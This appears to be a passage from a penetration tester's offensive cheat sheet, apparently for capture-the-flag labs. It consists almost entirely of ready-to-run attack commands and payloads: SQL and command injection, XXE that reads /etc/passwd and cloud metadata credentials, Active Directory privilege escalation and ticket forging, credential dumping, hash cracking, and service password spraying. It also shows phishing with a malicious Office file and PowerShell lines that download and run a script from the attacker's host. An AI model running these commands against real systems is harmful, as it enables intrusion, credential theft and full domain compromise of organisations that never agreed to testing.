username=admin', 'password', true, '2025-02-03 15:14:29.253', 2133415744)-- #&password1=admin&password2=admin	# INSERT INTO sqlinjection004_users (username, password, isAdmin, lastLogin, lastIP)
username=target';-- # &password1=test&password2=test 

[*] Command Injection
;id #
;sleep+10;
;sleep+10;cat+/etc/passwd+>+/var/www/images/test.txt;
;cat /etc/passwd
;echo 'L2V0Yy9wYXNzd2Q=' | base64 -d | xargs cat
;cat "$(echo 'L2V0Yy9wYXNzd2Q=' | base64 -d)"
;ls -la "$(echo 'Li4vLi4vLi4vCg==' | base64 -d)"
;ls -laR "$(echo 'Li4vLi4vLi4vLi4vLi4vCg==' | base64 -d)"
logname=;cat /etc/passwd > log.txt
&amp;id

[*] Content Types
application/x-httpd-php
application/json
application/javascript
application/xml
application/x-www-form-urlencoded
application/pdf
application/zip
application/x-tar
application/x-gzip
multipart/form-data
image/jpeg
image/png
image/gif
text/html
text/plain
text/css

[*] HTTP Methods
GET
HEAD
POST
PUT
DELETE
CONNECT
OPTIONS
TRACE
PATCH

[*] Headers
X-Forwarded-For: 1

[*] XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
	<productId>&xxe;</productId>
	<storeId>1</storeId>
</stockCheck>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>
<stockCheck>
	<productId>&xxe;</productId>
	<storeId>1</storeId>
</stockCheck>

productId=<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="file:///etc/passwd" parse="text" />

Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?><x>x</x>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

[*] JWT
git clone https://github.com/wallarm/jwt-secrets.git ~/.git/jwt_secrets

hashcat -a 0 -m 16500 <JWT> ~/.git/jwt_secrets/jwt.secrets.list

[*] GraphQL
Content-Type: application/json

{  "query":"{\n\n__schema\n\n{queryType{name}}"  }

{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

{"query":"{\u000A\n\r\t__schema\u000A\n\r\t{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

/api?query=query+IntrospectionQuery+%7B%0A++%0A%0A%0A%0A%5f%5fschema%0A%0A%0A%0A+%7B%0A++++queryType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++mutationType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++subscriptionType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++types+%7B%0D%0A++++++...FullType%0D%0A++++%7D%0D%0A++++directives+%7B%0D%0A++++++name%0D%0A++++++description%0D%0A++++++args+%7B%0D%0A++++++++...InputValue%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+FullType+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++description%0D%0A++fields%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++args+%7B%0D%0A++++++...InputValue%0D%0A++++%7D%0D%0A++++type+%7B%0D%0A++++++...TypeRef%0D%0A++++%7D%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++inputFields+%7B%0D%0A++++...InputValue%0D%0A++%7D%0D%0A++interfaces+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++enumValues%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++possibleTypes+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+InputValue+on+__InputValue+%7B%0D%0A++name%0D%0A++description%0D%0A++type+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++defaultValue%0D%0A%7D%0D%0A%0D%0Afragment+TypeRef+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++ofType+%7B%0D%0A++++kind%0D%0A++++name%0D%0A++++ofType+%7B%0D%0A++++++kind%0D%0A++++++name%0D%0A++++++ofType+%7B%0D%0A++++++++kind%0D%0A++++++++name%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A

nano gql; gqlspection -f gql

https://datafetcher.com/graphql-json-body-converter

{  "query": "query { getUser(id: 3) { id username }}"  }

{  "query": "mutation { deleteOrganizationUser(input: {id:3}) { user { id username } }}"  }

## Infrastructure
[*] Active Directory
+---------- Guide ----------+
https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

+---------- .ccache ----------+
impacket-getTGT -dc-ip $TARGET $DOM/'$USERNAME:$PASSWORD'; kcme

+---------- .ccache to evil-winrm ----------+
KRB5CCNAME='$USERNAME.ccache' evil-winrm -i $DC -r $DOM

+---------- ReadGMSAPassword ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get object 'SVC_ACC$' --attr msDS-ManagedPassword

+---------- AddKeyCredentialLink ----------+
certipy shadow auto -dc-ip $TARGET -target $DC -k -account 'SVC_CABACKUP'

+---------- AddSelf ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add groupMember 'DistinguishedName' '$USERNAME'; kcme

+---------- Owns ----------+
impacket-dacledit -dc-ip $TARGET $DOM/ -k -action 'write' -rights 'WriteMembers' -principal '$USERNAME' -target-dn 'DistinguishedName'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add groupMember 'DistinguishedName' '$USERNAME'

+---------- GenericWrite ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k set object 'DistinguishedName' servicePrincipalName -v 'http/anything'
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -usersfile usernames
certipy shadow auto -target $DC -u '$USERNAME' -k -account 'TargetUser'

+---------- ForceChangePassword ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k set password 'DistinguishedName' '123qweasdF!'

+---------- Remove Protected ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k remove groupMember 'CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB' 'CN=IT,CN=USERS,DC=RUSTYKEY,DC=HTB'

+---------- AddAllowedToAct / AllowedToAct ----------+
Set-ADComputer -PrincipalsAllowedToDelegateToAccount "OWNED_COMPUTER$" -Identity 'DC_COMPUTER_NAME'
export OWNED_COMPUTER='' # without $ sign
impacket-getTGT $DOM/"$OWNED_COMPUTER$":'$PASSWORD'; kcme
impacket-getST -dc-ip $TARGET $DOM/"$OWNED_COMPUTER$" -k -no-pass -impersonate administrator -spn "cifs/$DC"; mv *administrator@*.ccache administrator.ccache
impacket-getST -dc-ip $TARGET $DOM/"$OWNED_COMPUTER$" -k -no-pass -impersonate backupadmin -spn "cifs/$DC"; mv *backupadmin@*.ccache administrator.ccache;
kcme; impacket-atexec -dc-ip $TARGET $DC -k -no-pass "powershell -c iex (iwr -useb http://$MYIP:8888/ROOT.ps1)" | grep -vE '\[|-' | xargs -n1 | gg

$OWNED_COMPUTER='' # without $ sign
Set-ADComputer -PrincipalsAllowedToDelegateToAccount "$OWNED_COMPUTER$" -Identity 'DC_COMPUTER_NAME'
$ComputerSid = Get-DomainComputer "$OWNED_COMPUTER" -Properties objectsid | Select -Expand objectsid; $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC_COMPUTER_NAME | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
.\Rubeus.exe hash /password:OWNED_COMPUTER_PASSWORD
.\Rubeus.exe s4u /user:"$OWNED_COMPUTER$" /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:administrator /msdsspn:cifs/dc.rustykey.htb /ptt /nowrap
.\Rubeus.exe s4u /user:"$OWNED_COMPUTER$" /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/dc.rustykey.htb /ptt /nowrap
[+] Ticket successfully imported!
kirbi2ccache doIGfjCCBnqgAwIBB<SNIP>BASE64 HERE... administrator administrator.ccache;
kcme; impacket-atexec -dc-ip $TARGET $DC -k -no-pass "powershell -c iex (iwr -useb http://$MYIP:8888/ROOT.ps1)" | grep -vE '\[|-' | xargs -n1 | gg

+---------- Add ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add genericAll 'DistinguishedName' 'USER'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add groupMember 'DistinguishedName' 'USER'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k set owner 'DistinguishedName' 'USER'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add user 'myuser' '123qweasdF!'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add computer 'mypc' '123qweasdF!'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add rbcd 'TARGET' 'SERVICE'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add dcsync 'TRUSTEE'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add shadowCredentials 'TARGET'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add add uac 'TARGET'
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k add dnsRecord 'xxx.domain.example' '8.8.8.8'

+---------- Get ----------+
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get writable --detail
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get object User | grep -Ei 'pass|pwd' | grep -vE 'bad|Last|Time' | cat

+---------- Search ----------+
-->> Computers
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get search --filter "(&(objectClass=user)(!(sAMAccountType=805306368)))" | grep -av 'nTSecurityDescriptor:' | tee out_computers-info

-->> Users
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get search --filter "(&(objectClass=user)(!(sAMAccountType=805306369)))" | grep -av 'nTSecurityDescriptor:' | tee out_users-info

-->> Members of Groups
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get search --filter "(&(objectClass=group)(member=*))" --attr 'member','sAMAccountName' | sed -E '/^member: /{s/member: //;s/; */;\n/g;s/^/member:\n/;}' | tee out_membersofgroups-info

-->> Passwords and Keys
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get search --filter "(&(objectClass=*))" | grep -a -Ei 'pass|pwd|key'

+---------- Permissions ----------+
adminCount
AllExtendedRights
description
displayName
distinguishedName
ForceChangePassword
GenericAll
GenericWrite
homeDirectory
logonHours
logonWorkstation
member
memberOf
msDS-AllowedToActOnBehalfOfOtherIdentity
msDS-AllowedToDelegateTo
msDS-GroupMSAMembership
msDS-KeyCredentialLink
msDS-ManagedPassword
msDS-PrimaryComputer
primaryGroupID
profilePath
ResetPassword
sAMAccountName
scriptPath
Self
servicePrincipalName
tokenGroups
unicodePwd
UserAccountControl
ValidatedMSDS-AllowedToActOnBehalfOfOtherIdentity
ValidatedSPN
WriteDacl
WriteOwner

[*] Active Directory: CS
+---------- Guide ----------+
https://github.com/ly4k/Certipy/wiki/05-%E2%80%90-Usage

+---------- .ccache ----------+
impacket-getTGT $DOM/'$USERNAME:$PASSWORD'; kcme
impacket-getTGT $DOM/'$USERNAME' -hashes ':'; kcme

+---------- Search Vulnerable ----------+
certipy find -k -target $DC -dc-ip $TARGET -vulnerable -enabled -stdout | grep -vE '\[\*\]|Error|stacktrace'

+---------- AddKeyCredentialLink ----------+
certipy shadow auto -k -target $DC -dc-ip $TARGET -account 'SVC_CABACKUP'

+---------- ESC1 ----------+
adminSid=$(certipy account -k -target $DC -dc-ip $TARGET -user 'administrator' read 2>/dev/null | grep 'objectSid' | cut -d ':' -f2 | xargs -n1); certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -template '' -upn 'administrator' -sid "$adminSid" -key-size '4096'
certipy auth -k -domain $DC -dc-ip $TARGET -ldap-shell -pfx 'administrator.pfx'
change_password administrator 123qweasdF!
evil-winrm -i '$TARGET' -u 'administrator' -p '123qweasdF!'
impacket-atexec -dc-ip $TARGET $DOM/'administrator':'123qweasdF!'@$TARGET "cmd.exe /c for /d %F in (C:\Users\*) do for %f in (%F\Desktop\user.txt %F\Desktop\root.txt) do @if exist %f @type %f 2>NUL | findstr /R /C:\"^[0-9a-f][0-9a-f]*$\"" | grep -vE '\[|-' | xargs -n1 | gg

+---------- ESC4 ----------+
certipy template -k -target $DC -dc-ip $TARGET -template '' -write-default-configuration

+---------- ESC7 ----------+
certipy ca -k -target $DC -dc-ip $TARGET -ca "$CA" -add-officer '$USERNAME'
certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -template 'SubCA' -upn 'administrator' -key-size '4096' <<< 'y' | grep -v '[-]' | tee /dev/tty | awk '/Request ID is/ {printf "[*] Now use \x27%s.key\x27 in the following requests as -issue-request \x27%s\x27 and -retrieve \x27%s\x27\n", $5, $5, $5}'
certipy ca -k -target $DC -dc-ip $TARGET -ca "$CA" -issue-request ''
certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -retrieve ''
certipy auth -k -domain $DC -dc-ip $TARGET -pfx 'administrator.pfx'
kcme; impacket-psexec -dc-ip $TARGET -target-ip $TARGET $DC -k -no-pass "cmd /c type \\Users\\Administrator\\Desktop\\root.txt" | grep -v '\['

+---------- ESC10 ----------+
certipy account update -k -target $DC -dc-ip $TARGET -user 'WRITEABLE_UPN' -upn 'DC01$@$DOM'
certipy req -k -dc-ip $IP -target $DC -ca $CA -template 'User'
certipy account update -k -target $DC -dc-ip $TARGET -user 'WRITEABLE_UPN' -upn 'ORIGINAL_UPN@$DOM'
certipy auth -pfx DC01.pfx -dc-ip $IP -ldap-shell
set_rbcd DC01$ WRITEABLE_OWNER_USER
impacket-getST -k -no-pass -dc-ip $IP $DOM/'WRITEABLE_OWNER_USER' -spn 'cifs/DC01.mirage.htb' -impersonate DC01$
impacket-secretsdump -k -no-pass $DC -just-dc-user Administrator

+---------- ESC13 ----------+
certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -template 'VulnerableTemplate' -upn 'NEW_UPN' -key-size 4096
certipy auth -k -domain $DC -dc-ip $TARGET -pfx 'generated.pfx'; kcme
certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -template 'DifferentTemplate' -key-size 4096
certipy auth -k -domain $DC -dc-ip $TARGET -pfx 'generated.pfx'; kcme
impacket-reg -dc-ip $TARGET $DOM -k -no-pass backup -o '\programdata'
evil-winrm --> login --> cd \programdata; download SAM.save ... SECURITY.save ... SYSTEM.save ...
impacket-secretsdump -sam SAM.save -security SECURITY.save -system SYSTEM.save local
impacket-secretsdump DC01$@$DC -hashes '$MACHINE.ACC_HASH' -just-dc-ntlm

+---------- Request ----------+
certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -template '' -upn 'Administrator' -target $DC -key-size '4096'
certipy req -k -target $DC -dc-ip $TARGET -ca "$CA" -template '' -dynamic-endpoint

+---------- Forge ----------+
certutil -store my
certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
certipy forge -ca-pfx 'ca_exported.pfx' -upn ADMINISTRATOR@$DOM -subject 'CN=ADMINISTRATOR,CN=USERS,DC=$DOM,DC=LOCAL'
certipy auth -k -domain $DC -dc-ip $TARGET -ldap-shell -pfx 'administrator_forged.pfx'
change_password administrator 123qweasdF!
evil-winrm -i '$TARGET' -u 'administrator' -p '123qweasdF!'

+---------- Authenticate ----------+
certipy auth -k -domain $DC -dc-ip $TARGET -ldap-shell -pfx 'administrator.pfx'
change_password administrator 123qweasdF!
impacket-secretsdump -dc-ip $TARGET -target-ip $TARGET $DC -k -no-pass -just-dc-user administrator
evil-winrm -i $TARGET -u administrator -H ''

+---------- Crack ----------+
pfx2john user.pfx
openssl pkcs12 -in user.pfx -nocerts -out auth.key-enc
openssl rsa -in auth.key-enc -out auth.key
openssl pkcs12 -in user.pfx -clcerts -nokeys -out auth.crt
evil-winrm -i $TARGET -S -k auth.key -c auth.crt

[*] Active Directory: GPO
+---------- Get ----------+
Get-GPO -All
Get-GPO -Name "Default Domain Controllers Policy"

+---------- Permissions ----------+
Get-GPPermission -Name "Default Domain Controllers Policy" -All
Get-GPPermission -Name "Default Domain Controllers Policy" -TargetName "GPO Managers" -TargetType Group

+---------- Execute ----------+
python3 pygpoabuse.py -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD' -taskname 'Custom Task' -gpo-id '6ac1786c-016f-11d2-945f-00c04fb984f9'
gpupdate /force
impacket-getTGT $DOM/'myadmin':'123qweasdF!'; kcme; impacket-psexec -dc-ip $TARGET -target-ip $TARGET $DC -k -no-pass "cmd /c @for /d %u in (C:\\Users\\*) do @type \"%u\\Desktop\\user.txt\" 2>nul & @type \"%u\\Desktop\\root.txt\" 2>nul" | grep -v '\['

[*] Cracking
+---------- Identify ----------+
haiti cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc

+---------- PFX ----------+
pfx2john auth.pfx
openssl pkcs12 -in auth.pfx -nocerts -out auth.key-enc
openssl rsa -in auth.key-enc -out auth.key
openssl pkcs12 -in auth.pfx -clcerts -nokeys -out auth.crt
evil-winrm -i $TARGET -S -k auth.key -c auth.crt

+---------- HEX ----------+
echo -n '6b,cf,2a,4b,6e,5a,ca,0f' | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
echo -n '6bcf2a4b6e5aca0f' | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d

+---------- John ----------+
john hashes -w=$rockyou
john hashes --show

+---------- *2john ----------+
/usr/bin/1password2john
/usr/bin/7z2john
/usr/sbin/bitlocker2john
/usr/bin/ccache2john
/usr/bin/cisco2john
/usr/bin/dashlane2john
/usr/bin/diskcryptor2john
/usr/bin/DPAPImk2john
/usr/bin/ecryptfs2john
/usr/bin/enpass2john
/usr/bin/filezilla2john
/usr/sbin/gpg2john
/usr/sbin/hccap2john
/usr/bin/htdigest2john
/usr/bin/kdcdump2john
/usr/sbin/keepass2john
/usr/bin/keychain2john
/usr/bin/keyring2john
/usr/bin/keystore2john
/usr/bin/kirbi2john
/usr/bin/krb2john
/usr/bin/lastpass2john
/usr/bin/libreoffice2john
/usr/bin/luks2john
/usr/bin/mozilla2john
/usr/bin/office2john
/usr/bin/openssl2john
/usr/bin/padlock2john
/usr/bin/pcap2john
/usr/bin/pdf2john
/usr/bin/pem2john
/usr/bin/pfx2john
/usr/sbin/putty2john
/usr/bin/pwsafe2john
/usr/bin/radius2john
/usr/sbin/rar2john
/usr/bin/sap2john
/usr/bin/ssh2john
/usr/bin/telegram2john
/usr/bin/truecrypt2john
/usr/bin/vmx2john
/usr/sbin/zip2john

+---------- Hashcat ----------+
hashcat -h | grep -A 475 "Hash modes" | grep -i 'kerberos'
hashcat -h | grep -A 475 "Hash modes" | grep -i 'ntlm'
hashcat -h | grep -A 475 "Hash modes" | grep -i 'shadow'
hashcat -h | grep -A 475 "Hash modes" | grep -i 'descrypt'
hashcat -h | grep -A 475 "Hash modes" | grep -i 'office'
hashcat -h | grep -A 475 "Hash modes" | grep -i 'bcrypt'

cd \hashcat && hashcat.exe -m 13721 hashes mutated.txt
cd \hashcat && hashcat.exe -m 13100 hashes rockyou.txt

0 	MD5
100	SHA1
1400	SHA256
1700	SHA512
500 	md5crypt
1800 	sha512crypt
7400 	sha256crypt
1500 	descrypt
3200 	bcrypt
1000 	NTLM
3000 	LM
5500 	NetNTLMv1
5600 	NetNTLMv2
400     phpass (WordPress, Joomla, phpBB)
18200	Kerberos 5 TGS-REP etype 17
18300	Kerberos 5 TGS-REP etype 18
13100 	Kerberos 5 TGS-REP etype 23
7500 	Kerberos 5 AS-REQ Pre-Auth etype 23
15300 	DPAPI masterkey
15900 	DPAPI domain backupkey
2100	Domain Cached Credentials (DCC)
1100	Domain Cached Credentials 2 (DCC2)
11300	MSSQL 2012+
13200	AxCrypt
13400 	KeePass
12500 	RAR3-hp
13000 	RAR5
13600 	WinZip
17220 	7-Zip
18300 	BitLocker
13711 	VeraCrypt
9400	MS Office 2007
9500	MS Office 2010
9600	MS Office 2013

+---------- Word Count Wordlist ----------+
wc -w /usr/share/seclists/Passwords/Leaked-Databases/rockyou*.txt

[*] (21) FTP
+---------- Spray Service ----------+
(hydra -I ftp://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- List Files ----------+
nxc ftp "$TARGET" -u '$USERNAME' -p '$PASSWORD' --ls

+---------- Download Directory ----------+
wget ftp://$TARGET --ftp-user='$USERNAME' --ftp-password='$PASSWORD' -np -nH -m -q -P ftp

+---------- Upload File ----------+
curl ftp://$TARGET -u '$USERNAME':'$PASSWORD' -T filename.txt

+---------- Login to Service ----------+
ftp '$USERNAME'@"$TARGET"
anonymous
ls -a
binary
ascii
get file.txt -

[*] (22) SSH
+---------- Spray Service ----------+
(hydra -I ssh://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- View Key Types ----------+
ssh -Q key

+---------- List of Key Types ----------+
ssh-ed25519
ssh-rsa
ssh-dss
ssh-ed25519-cert-v01@openssh.com
ssh-rsa-cert-v01@openssh.com
ssh-dss-cert-v01@openssh.com
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
ecdsa-sha2-nistp256-cert-v01@openssh.com
ecdsa-sha2-nistp384-cert-v01@openssh.com
ecdsa-sha2-nistp521-cert-v01@openssh.com

+---------- Remove Existing Keys ----------+
ssh-add -D

+---------- Create New Key Pairs ----------+
ssh-keygen -t ed25519 -f id_ed25519 -N ''; chmod 600 id_ed25519 id_ed25519.pub; cat id_ed25519.pub
ssh-keygen -t rsa -f id_rsa -N ''; chmod 600 id_rsa id_rsa.pub; cat id_rsa.pub
ssh-keygen -t dsa -f id_dsa -N ''; chmod 600 id_dsa id_dsa.pub; cat id_dsa.pub

+---------- Add Public Key to Authorized Keys ----------+
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDAS3I0GV78pbzK7Kd3m44tFBbqX1sXRpCv6LPjle3yW root@hostname' > TARGET > ~/.ssh/authorized_keys

+---------- Login to Service ----------+
sshuttle --ssh-cmd "ssh -i $HOME/.ssh/id_ed25519" -r $USERNAME@$TARGET 0.0.0.0/0 -v
ssh $USERNAME@$TARGET -i id_ed25519 -oHostKeyAlgorithms=+ssh-ed25519 -oPubkeyAcceptedKeyTypes=+ssh-ed25519
ssh $USERNAME@$TARGET -i id_rsa -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa
ssh $USERNAME@$TARGET -i id_dsa -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedKeyTypes=+ssh-dss

+---------- Port Forwarding ----------+
sshuttle --ssh-cmd "ssh -i $HOME/.ssh/id_ed25519" -r $USERNAME@$TARGET 0.0.0.0/0 -v
ssh $USERNAME@$TARGET -i id_ed25519 -L 33060:Localhost:33060 -L 5000:Localhost:5000
ssh $USERNAME@$TARGET -i id_rsa -L 33060:Localhost:33060 -L 5000:Localhost:5000
ssh $USERNAME@$TARGET -i id_dsa -L 33060:Localhost:33060 -L 5000:Localhost:5000

+---------- Vault ----------+
vault secrets enable ssh
vault list ssh/roles
vault write ssh/roles/root default_user=root key_type=otp cidr_list=0.0.0.0/0
vault write ssh/creds/root ip=$TARGET
ssh root@$TARGET # key xxxxxxxxx-xxxx-xxxx-xxxxxxxxx

[*] (23) Telnet
+---------- Spray Service ----------+
(hydra -I telnet://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Login to Service ----------+
telnet --user '$USERNAME' $TARGET

[*] (25) SMTP
+---------- Search ----------+
nmap -p 25 --script="smtp* and not brute" --script-args "smtp-enum-users.methods={VRFY},userdb=/usr/share/nmap/nselib/data/usernames.lst" $TARGET

+---------- Create Malicious File ----------+
rlwrap msfconsole -q -x 'use exploit/windows/fileformat/office_word_hta; set SRVHOST tun0; set SRVPORT 8080; set LHOST tun0; set LPORT 7788; set FILENAME file.doc; run'

+---------- Send ----------+
swaks \
        --to administrator@$DOM \
        --from $USERNAME@$DOM \
        --h-Subject "Important Document" \
        --body "This is the document you asked for. Thanks again" \
        --attach "$HOME"/.msf4/local/file.doc \
        --server $TARGET \
        -a NTLM -au '$USERNAME' -ap '$PASSWORD'

sendemail \
        -s $TARGET \
        -f "Admin Team <admin@$DOM>" \
        -t career@$DOM \
        -o tls=no \
        -u "Subject: Important Document" \
        -m "This is the document you asked for. Thanks again" \
        -a "$HOME"/.msf4/local/file.doc

[*] (53) DNS
dig axfr @$TARGET $DOM

[*] (79) Finger
finger '$USERNAME'@$TARGET
while read -r user; do finger "$user"@$TARGET; done < usernames

[*] (88) Kerberos
+---------- .ccache ----------+
impacket-getTGT $DOM/'$USERNAME' -hashes :8846F7EAEE8FB117AD06BDD830B7586C; kcme

+---------- Kerberos .ccache Negotiation ----------+
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -request
impacket-findDelegation -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass
impacket-addcomputer -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -computer-name mypc -computer-pass '123qweasdF!'
impacket-rbcd -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD' -action write -delegate-from mypc$ -delegate-to DC$
impacket-getTGT $DOM/'mypc$':'123qweasdF!'; kcme
impacket-getST $DOM/mypc$ -k -no-pass -impersonate administrator -spn "cifs/$DC"; mv *administrator@*.ccache administrator.ccache; kcme
impacket-secretsdump -dc-ip $TARGET -target-ip $TARGET $DC -k -no-pass -just-dc-user administrator
evil-winrm -i $TARGET -u administrator -H ''

impacket-changepasswd -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -newpass '123qweasdF!'
impacket-changepasswd -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -newpass '123qweasdF!' -p kpasswd -reset
impacket-changepasswd -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -newhashes :$(impacket-describeTicket $USERNAME.ccache | grep 'Ticket Session Key' | cut -d ':' -f 2 | xargs)
while IFS= read -r user; do echo "\n*-------------------*\n$user"; impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -request-user '$user'; done < usernames

+---------- Silver Ticket ----------+
-->> Domain SID
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get search --filter "(&(ObjectClass=user)(objectSid=*)(!(ObjectClass=foreignSecurityPrincipal)))" --attr objectSid | grep -avE 'nTSecurityDescriptor:|distinguishedName:' | cut -d ' ' -f 2 | sed 's/-[0-9]\+$//' | sort -u | sed '/^$/d' | tee silver-ticket

-->> Service Principal Name
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -request | awk '{print $1}' | grep -vE 'Impacket|\$krb5|Service|----|^$|\[' | cut -d '/' -f 1 >> silver-ticket; cat silver-ticket

-->> Service Account Password Hash
echo -n '$PASSWORD' | iconv -t UTF-16LE | openssl dgst -md4 | cut -d ' ' -f 2 | sed 's/.*/\U&/' >> silver-ticket; cat silver-ticket

-->> Create Ticket
cat silver-ticket | { read a; read _; read c; impacket-ticketer -domain $DOM -domain-sid "$a" -spn "cifs/$DC" -nthash "$c" administrator 2>/dev/null; }; kcme

+---------- Golden Ticket ----------+
impacket-goldenPac -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD'@$DC


[*] (135) RPC
rpcclient -U '$USERNAME'%'$PASSWORD' $TARGET -c "enumdomusers"
rpcclient -U '$USERNAME'%'$PASSWORD' $TARGET -c "lsaquery"
rpcclient -U '$USERNAME'%'$PASSWORD' $TARGET -c "querydispinfo" | grep -oP 'Account:.*' | sed 's/Name:.*Desc:/Desc:/'

for host in $(cat dc-hosts); do echo "================[   $host   ]==============="; rpcclient -U "" $host -N -c "enumdomusers"; done
for host in $(cat dc-hosts); do rpcclient -U "" $host -N -c "enumdomusers"; done | grep -oP 'user:\[\K[^]]+'

[*] (161) SNMP
+---------- Spray Service ----------+
